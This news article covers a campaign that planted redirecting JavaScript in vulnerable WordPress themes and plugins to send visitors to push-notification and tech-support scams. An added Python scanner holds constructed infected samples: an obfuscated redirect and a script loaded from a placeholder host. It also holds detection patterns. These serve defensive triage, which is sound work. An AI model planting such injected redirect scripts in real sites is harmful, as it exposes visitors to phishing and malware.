Hackers Are Exploiting WordPress Themes, Plugins to Hawk Scams

Thousands of WordPress sites have been hacked via known vulnerabilities in recent months, according to security firm Sucuri.

If you’ve visited a website in recent days and been randomly redirected to the same pages with sketchy “resources” or unwanted ads, it’s likely the site in question was 1) built with WordPress tools and 2) hacked.

Researchers at Sucuri, a security provider owned by GoDaddy, revealed on Wednesday that the hackers behind a months-long campaign focused on injecting malicious scripts into WordPress themes and plugins with known security holes were at work yet again.

It’s important to note that these hacks are related to themes and plugins built by thousands of third-party developers using the open source WordPress software, not WordPress.com, which offers hosting and tools to build websites. Automattic, WordPress.com’s parent company, is a major contributor to the software but does not own it.

According to Sucuri, there are 322 WordPress sites with plugins and themes that have been affected by this new exploit, although the “actual number of impacted websites is likely much higher.”

In April alone, hackers used this tactic to infect nearly 6,000 sites, Sucuri malware analyst Krasimir Konov stated.

Sucuri noticed the hackers’ intrusions this past Monday while investigating WordPress sites that complained of unwanted redirects. All of the websites shared a common issue, Konov explained; they contained a malicious JavaScript hidden in their files and databases.

The JavaScript creates redirects that lead users to a range of poisoned apples, including phishing pages and malware, the researcher explained. Worst of all, visitors might not even notice they’re going down the internet’s version of a dark and dangerous alley, as the redirect landing page looks fairly innocent.
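The campaign described above puts injected JavaScript into theme and plugin files and into database content, and the script's job is to redirect the visitor. As an added illustration of how a site owner could look for that pattern (this is not Sucuri's tooling or code from the report), the scanner below flags script blocks that contain a redirect sink, show common obfuscation helpers, or load from a host outside a site-specific allowlist. The allowlisted host, the file samples and the `redirect.invalid` placeholder host are all constructed for the example; the same function can be run over the text of a `wp_posts` or `wp_options` dump, since the report notes the script was found in databases as well as files.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from pathlib import Path

# Hypothetical allowlist of script hosts the site legitimately uses (an assumption
# for this example); any other external script source is reported.
TRUSTED_SCRIPT_HOSTS = {"example-cdn.test"}

# Redirect sinks and obfuscation helpers that injected redirect scripts often rely on.
REDIRECT_SINKS = re.compile(
    r"(window|document)\.location(\.href|\.replace|\.assign)?\s*[=(]|"
    r"\blocation\.(href|replace|assign)\b",
    re.IGNORECASE,
)
OBFUSCATION = re.compile(
    r"\beval\s*\(|\batob\s*\(|String\.fromCharCode|\bunescape\s*\(",
    re.IGNORECASE,
)
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)


@dataclass
class Finding:
    source: str   # file path, or "db:<table>:<id>" for database content
    reason: str   # why the script block was flagged
    snippet: str  # first 80 characters of the block, for triage


def scan_text(text: str, source: str) -> list[Finding]:
    """Flag <script> blocks that redirect, look obfuscated, or load from an untrusted host."""
    findings: list[Finding] = []
    for m in SCRIPT_TAG.finditer(text):
        attrs, body = m.group(1), m.group(2)
        snippet = m.group(0)[:80]
        src = SRC_ATTR.search(attrs)
        if src and src.group(1).lower() not in TRUSTED_SCRIPT_HOSTS:
            findings.append(Finding(source, f"external script from untrusted host {src.group(1)}", snippet))
        redirects, obfuscated = bool(REDIRECT_SINKS.search(body)), bool(OBFUSCATION.search(body))
        if redirects and obfuscated:
            findings.append(Finding(source, "obfuscated inline script that redirects", snippet))
        elif redirects:
            findings.append(Finding(source, "inline script that redirects", snippet))
        elif obfuscated:
            findings.append(Finding(source, "obfuscated inline script", snippet))
    return findings


def scan_theme_dir(root: Path) -> list[Finding]:
    """Walk a wp-content/themes or wp-content/plugins tree and scan every PHP/JS/HTML file."""
    results: list[Finding] = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html"}:
            results.extend(scan_text(path.read_text(errors="replace"), str(path)))
    return results


# Constructed samples (not real infected files): a clean footer and one with an injected redirect.
CLEAN_FOOTER = """<footer><?php wp_footer(); ?></footer>
<script src="https://example-cdn.test/app.js"></script>"""

INJECTED_FOOTER = """<footer><?php wp_footer(); ?></footer>
<script>var _0x=String.fromCharCode(104,116,116,112,115,58,47,47);
window.location.replace(_0x+"redirect.invalid/?z=1");</script>"""

# Constructed wp_posts row: the same kind of payload can sit in post_content in the database.
INJECTED_POST = "<p>Hello world</p><script src='//redirect.invalid/inject.js'></script>"


def demo() -> tuple[list[Finding], list[Finding], list[Finding]]:
    return (
        scan_text(CLEAN_FOOTER, "themes/demo/footer.php"),
        scan_text(INJECTED_FOOTER, "themes/demo/footer.php"),
        scan_text(INJECTED_POST, "db:wp_posts:1"),
    )


if __name__ == "__main__":
    for findings in demo():
        for f in findings:
            print(f"{f.source}: {f.reason}: {f.snippet!r}")
```

The clean footer produces no findings, the injected footer is reported as an obfuscated inline redirect, and the database row is reported for loading a script from a host outside the allowlist. A scanner like this is a triage aid, not a cleanup: anything it flags should be compared against a known-good copy of the theme or plugin, and the vulnerable component updated or removed, since the injection will return as long as the original security hole stays open.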

“This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser,” Konov wrote.

If that weren’t bad enough, Konov said that opt-in maneuvers for push notifications are one of the most common ways hackers can run tech support scams. These consist of the annoying windows that pop up out of nowhere to tell you that your computer is infected and that you should call a phone number to get it fixed. Do not do this. The Federal Trade Commission, which is an expert in detecting scams, helpfully points out that real security messages and warnings will not ask you to call a phone number to get tech help.

WordPress.com on Thursday told Gizmodo that plugins and themes are independently written and maintained outside of the core WordPress software. In regards to Sucuri’s report, the company said that any plugin or theme hosted on WordPress.org, the website for the software, “is regularly scanned for vulnerabilities.”

“If security issues are identified, plugin and theme authors are notified immediately. Specific to Sucuri’s report, any plugin that wasn’t patched was either closed or not hosted on WordPress.org. WordPress.org also provides resources on security to both theme developers and plugin developers,” a spokesperson for WordPress.com said. “For self-hosted sites, WordPress users are notified and encouraged to update core software, plugins and themes by default.”

Sites hosted on WordPress.com are also offered services that address vulnerabilities like those referenced in the report, the spokesperson added.